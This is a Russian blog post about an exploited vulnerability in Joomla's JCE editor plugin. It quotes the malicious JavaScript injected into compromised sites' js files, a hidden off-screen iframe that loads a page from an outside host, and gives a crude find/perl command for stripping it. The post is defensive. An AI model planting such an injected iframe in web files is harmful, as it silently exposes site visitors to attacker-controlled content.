Уязвимость Joomla с редактором JCE

В плагине редакторе JCE версии ниже 2.0.11 была обнаружена уязвимость и имеет место быть большая череда взломов с последующим внедрением вредоносного кода в js-файлы.
Тот случай, который был виден мной, состоял из следующего кода:

document.write(‘<iframe width=»55″ height=»55″ style=»width:100px;height:100px;position:absolute;left:-100px;top:0;» src=»http://cpjutiv.wikaba.com/0ca0885.tet?11″></iframe>’);

Можно попробовать выполнить следующую команду в корне директории сайта, однако она несколько грубоватая

find ./ -type f -name «*.js» -exec perl -pi -e ‘s/docume.*\)\;//g»’ ‘{}’ \;

и как обычно рекомендую перед этим сделать резервную копию сайта.

Другие публикации по теме:

ку-ку Собственно, не осилил с ходу обновление с Drupal 6 на Drupal 7. Слишком много не совсем случайных факторов ;-) Плюс сложности с пониманием Postgres...
5×5: Страны, которые используют Joomla! на го... Стив Бург в статье своего блога (ссылку см. ниже) показал 5 стран, которые используют Joomla! для работы своих официальных сайтовМы запустили ...
Плагин поиска по mediawiki 1.18.x для Joomla! 2.5... Плагин написан в замен MediaWiki Search, чья версия подходит только для использования с Joomla! 1.5.x. Автор - фрилансер с joomlaforum.ru ;)Превос...
Windows 7. Обновление безопасности .NET Framework ... В течение второго месяца меня преследуют два обновления безопаности Windows 7, которые постоянно и по кругу скачиваются и устанавливаются успешно. И н...

Поделиться информацией с друзьями!

Чтобы не пропустить обновления, подпишись на RSS или почтовую рассылку (свой выбор сделали уже 128 человек!)

1 комментарий к “Уязвимость Joomla с редактором JCE

  1. Блин я в то же дерьмо вляпался.. Спасибо, сейчас хоть немного прояснилось.

Оставить комментарий